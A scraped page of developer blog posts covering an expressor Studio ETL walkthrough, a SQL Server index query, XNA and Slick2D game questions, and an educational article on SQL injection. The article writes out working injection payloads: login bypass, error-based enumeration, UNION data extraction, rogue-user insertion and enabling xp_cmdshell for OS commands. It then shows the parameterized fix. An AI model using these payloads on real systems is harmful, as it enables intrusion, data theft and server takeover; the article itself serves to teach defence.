For this example, two connection artifacts are required: a file connection, which encapsulates the file system location of my file; and a database connection, which encapsulates the database connection information.  With expressor Studio, I use wizards to create these artifacts. First click New Connection > File Connection in the Home tab of expressor Studio’s ribbon bar, which starts the File Connection wizard.  In the first window, I enter the path to the directory that contains the input file.  Note that the file connection artifact only specifies the file system location, not the name of the file. Then I click Next and enter a meaningful name for this connection artifact; clicking Finish closes the wizard and saves the artifact. To create the Database Connection artifact, I must know the location of, or instance name, of the target database and have the credentials of an account with sufficient privileges to write to the target table.  To use expressor Studio’s features to the fullest, this account should also have the authority to create a table. I click the New Connection > Database Connection in the Home tab of expressor Studio’s ribbon bar, which starts the Database Connection wizard.  expressor Studio includes high-performance drivers for many relational database management systems, so I can simply make a selection from the “Supplied database drivers” drop down control.  If my desired RDBMS isn’t listed, I can optionally use an existing ODBC DSN by selecting the “Existing DSN” radio button. In the following window, I enter the connection details.  With Microsoft SQL Server, I may choose to use Windows Authentication rather than rather than account credentials.  After clicking Next, I enter a meaningful name for this connection artifact and clicking Finish closes the wizard and saves the artifact. Now I create a schema artifact, which describes the structure of the file data.  When expressor reads a file, all data fields are typed as strings.  In some use cases this may be exactly what is needed and there is no need to edit the schema artifact.  But in this example, editing the schema artifact will be used to specify how the data should be transformed; that is, reformat the dates to include century designations, change the employee and job ID’s to integers, and convert the salary to a decimal value. Again a wizard is used to create the schema artifact.  I click New Schema > Delimited Schema in the Home tab of expressor Studio’s ribbon bar, which starts the Database Connection wizard.  In the first window, I click Get Data from File, which then displays a listing of the file connections in the project.  When I click on the file connection I previously created, a browse window opens to this file system location; I then select the file and click Open, which imports 10 lines from the file into the wizard. I now view the file’s content and confirm that the appropriate delimiter characters are selected in the “Field Delimiter” and “Record Delimiter” drop down controls; then I click Next. Since the input file includes a header row, I can easily indicate that fields in the file should be identified through the corresponding header value by clicking “Set All Names from Selected Row. “ Alternatively, I could enter a different identifier into the Field Details > Name text box.  I click Next and enter a meaningful name for this schema artifact; clicking Finish closes the wizard and saves the artifact. Now I open the schema artifact in the schema editor.  When I first view the schema’s content, I note that the types of all attributes in the Semantic Type (the right-hand panel) are strings and that the attribute names are the same as the field names in the data file.  To change an attribute’s name and type, I highlight the attribute and click Edit in the Attributes grouping on the Schema > Edit tab of the editor’s ribbon bar.  This opens the Edit Attribute window; I can change the attribute name and select the desired type from the “Data type” drop down control.  In this example, I change the name of each attribute to the name of the corresponding database table column (EmployeeID, StartingDate, TerminationDate, JobDescription, DepartmentID, and FinalSalary).  Then for the EmployeeID and DepartmentID attributes, I select Integer as the data type, for the StartingDate and TerminationDate attributes, I select Datetime as the data type, and for the FinalSalary attribute, I select the Decimal type. But I can do much more in the schema editor.  For the datetime attributes, I can set a constraint that ensures that the data adheres to some predetermined specifications; a starting date must be later than January 1, 1980 (the date on which the company began operations) and a termination date must be earlier than 11:59 PM on December 31, 1999.  I simply select the appropriate constraint and enter the value (1980-01-01 00:00 as the starting date and 1999-12-31 11:59 as the termination date). As a last step in setting up these datetime conversions, I edit the mapping, describing the format of each datetime type in the source file. I highlight the mapping line for the StartingDate attribute and click Edit Mapping in the Mappings grouping on the Schema > Edit tab of the editor’s ribbon bar.  This opens the Edit Mapping window in which I either enter, or select, a format that describes how the datetime values are represented in the file.  Note the use of Y01 as the syntax for the year.  This syntax is the indicator to expressor Studio to derive the century by setting any year later than 01 to the 20th century and any year before 01 to the 21st century.  As each datetime value is read from the file, the year values are transformed into century and year values. For the TerminationDate attribute, my format also indicates that the datetime value includes hours and minutes. And now to the Salary attribute. I open its mapping and in the Edit Mapping window select the Currency tab and the “Use currency” check box.  This indicates that the file data will include the dollar sign (or in Europe the Pound or Euro sign), which should be removed. And on the Grouping tab, I select the “Use grouping” checkbox and enter 3 into the “Group size” text box, a comma into the “Grouping character” text box, and a decimal point into the “Decimal separator” character text box. These entries allow the string to be properly converted into a decimal value. By making these entries into the schema that describes my input file, I’ve specified how I want the data transformed prior to writing to the database table and completely removed the requirement for coding within the data integration application itself. Assembling the data integration application is simple.  Onto the canvas I drag the Read File and Write Table operators, connecting the output of the Read File operator to the input of the Write Table operator. Next, I select the Read File operator and its Properties panel opens on the right-hand side of expressor Studio.  For each property, I can select an appropriate entry from the corresponding drop down control.  Clicking on the button to the right of the “File name” text box opens the file system location specified in the file connection artifact, allowing me to select the appropriate input file.  I indicate also that the first row in the file, the header row, should be skipped, and that any record that fails one of the datetime constraints should be skipped. I then select the Write Table operator and in its Properties panel specify the database connection, normal for the “Mode,” and the “Truncate” and “Create Missing Table” options.  If my target table does not yet exist, expressor will create the table using the information encapsulated in the schema artifact assigned to the operator. The last task needed to complete the application is to create the schema artifact used by the Write Table operator.  This is extremely easy as another wizard is capable of using the schema artifact assigned to the Read Table operator to create a schema artifact for the Write Table operator.  In the Write Table Properties panel, I click the drop down control to the right of the “Schema” property and select “New Table Schema from Upstream Output…” from the drop down menu. The wizard first displays the table description and in its second screen asks me to select the database connection artifact that specifies the RDBMS in which the target table will exist.  The wizard then connects to the RDBMS and retrieves a list of database schemas from which I make a selection.  The fourth screen gives me the opportunity to fine tune the table’s description.  In this example, I set the width of the JobDescription column to a maximum of 40 characters and select money as the type of the LastSalary column.  I also provide the name for the table. This completes development of the application.  The entire application was created through the use of wizards and the required data transformations specified through simple constraints and specifications rather than through coding.  To develop this application, I only needed a basic understanding of expressor Studio, a level of expertise that can be gained by working through a few introductory tutorials.  expressor Studio is as close to a point and click data integration tool as one could want and I urge you to try this product if you have a need to move data between files or from files to database tables. Check out CSVexpress in more detail.  It offers a few basic video tutorials and a preview of expressor Studio 3.5, which will support the reading and writing of data into Salesforce.com. Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, PostADay, SQL, SQL Authority, SQL Documentation, SQL Download, SQL Query, SQL Server, SQL Tips and Tricks, SQLServer, T SQL, Technology

    Read the article

  • SQL SERVER – Identify Most Resource Intensive Queries – SQL in Sixty Seconds #029 – Video

    - by pinaldave
    There are a few questions I often get asked. I wonder how interesting is that in our daily life all of us have to often need the same kind of information at the same time. Here is the example of the similar questions: How many user created tables are there in the database? How many non clustered indexes each of the tables in the database have? Is table Heap or has clustered index on it? How many rows each of the tables is contained in the database? I finally wrote down a very quick script (in less than sixty seconds when I originally wrote it) which can answer above questions. I also created a very quick video to explain the results and how to execute the script. Here is the complete script which I have used in the SQL in Sixty Seconds Video. SELECT [schema_name] = s.name, table_name = o.name, MAX(i1.type_desc) ClusteredIndexorHeap, COUNT(i.TYPE) NoOfNonClusteredIndex, p.rows FROM sys.indexes i INNER JOIN sys.objects o ON i.[object_id] = o.[object_id] INNER JOIN sys.schemas s ON o.[schema_id] = s.[schema_id] LEFT JOIN sys.partitions p ON p.OBJECT_ID = o.OBJECT_ID AND p.index_id IN (0,1) LEFT JOIN sys.indexes i1 ON i.OBJECT_ID = i1.OBJECT_ID AND i1.TYPE IN (0,1) WHERE o.TYPE IN ('U') AND i.TYPE = 2 GROUP BY s.name, o.name, p.rows ORDER BY schema_name, table_name Related Tips in SQL in Sixty Seconds: Find Row Count in Table – Find Largest Table in Database Find Row Count in Table – Find Largest Table in Database – T-SQL Identify Numbers of Non Clustered Index on Tables for Entire Database Index Levels, Page Count, Record Count and DMV – sys.dm_db_index_physical_stats Index Levels and Delete Operations – Page Level Observation What would you like to see in the next SQL in Sixty Seconds video? Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Database, Pinal Dave, PostADay, SQL, SQL Authority, SQL in Sixty Seconds, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology, Video Tagged: Excel

    Read the article

  • Jumping Vs. Gravity

    - by PhaDaPhunk
    Hi i'm working on my first XNA 2D game and I have a little problem. If I jump, my sprite jumps but does not fall down. And I also have another problem, the user can hold spacebar to jump as high as he wants and I don't know how to keep him from doing that. Here's my code: The Jump : if (FaKeyboard.IsKeyDown(Keys.Space)) { Jumping = true; xPosition -= new Vector2(0, 5); } if (xPosition.Y >= 10) { Jumping = false; Grounded = false; } The really simple basic Gravity: if (!Grounded && !Jumping) { xPosition += new Vector2(1, 3) * speed; } Here's where's the grounded is set to True or False with a Collision Rectangle MegamanRectangle = new Rectangle((int)xPosition.X, (int)xPosition.Y, FrameSizeDraw.X, FrameSizeDraw.Y); Rectangle Block1Rectangle = new Rectangle((int)0, (int)73, Block1.Width, Block1.Height); Rectangle Block2Rectangle = new Rectangle((int)500, (int)73, Block2.Width, Block2.Height); if ((MegamanRectangle.Intersects(Block1Rectangle) || (MegamanRectangle.Intersects(Block2Rectangle)))) { Grounded = true; } else { Grounded = false; } The grounded bool and The gravity have been tested and are working. Any ideas why? Thanks in advance and don't hesitate to ask if you need another Part of the Code.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • java slick2D - problem using ScalableGame class

    - by nellykvist
    I have problem adjusting the size of the screen, using the ScalableGame class from Slick2D library. So, what I want to achieve, whenever I change display size, background should adjust to screen size, and objects (images, grahpic shapes) should fit (scale). Alright, so this is how state looks by default. I can change screen size, but images and graphic shapes does not appGameContainer = new AppGameContainer(     new ScalableGame(new AppStateController(), Settings.video.getWidth(), Settings.video.getHeight(), true) ); appGameContainer.setDisplayMode(Settings.video.getWidth(), Settings.video.getHeight(), Settings.video.isFullScreen()); appGameContainer.start(); If I assign to width/height +100, ScalableGame constructor: appGameContainer = new AppGameContainer(     new ScalableGame(new AppStateController(), Settings.video.getWidth() + 100, Settings.video.getHeight() + 100, true) ); appGameContainer.setDisplayMode(Settings.video.getWidth(), Settings.video.getHeight(), Settings.video.isFullScreen()); appGameContainer.start(); If I assign to width/height +100, to display: appGameContainer = new AppGameContainer(     new ScalableGame(new AppStateController(), Settings.video.getWidth(), Settings.video.getHeight(), true) ); appGameContainer.setDisplayMode(Settings.video.getWidth() + 100, Settings.video.getHeight() + 100, Settings.video.isFullScreen()); appGameContainer.start();

    Read the article

< Previous Page | 239 240 241 242 243 244 245 246 247 248 249 250  | Next Page >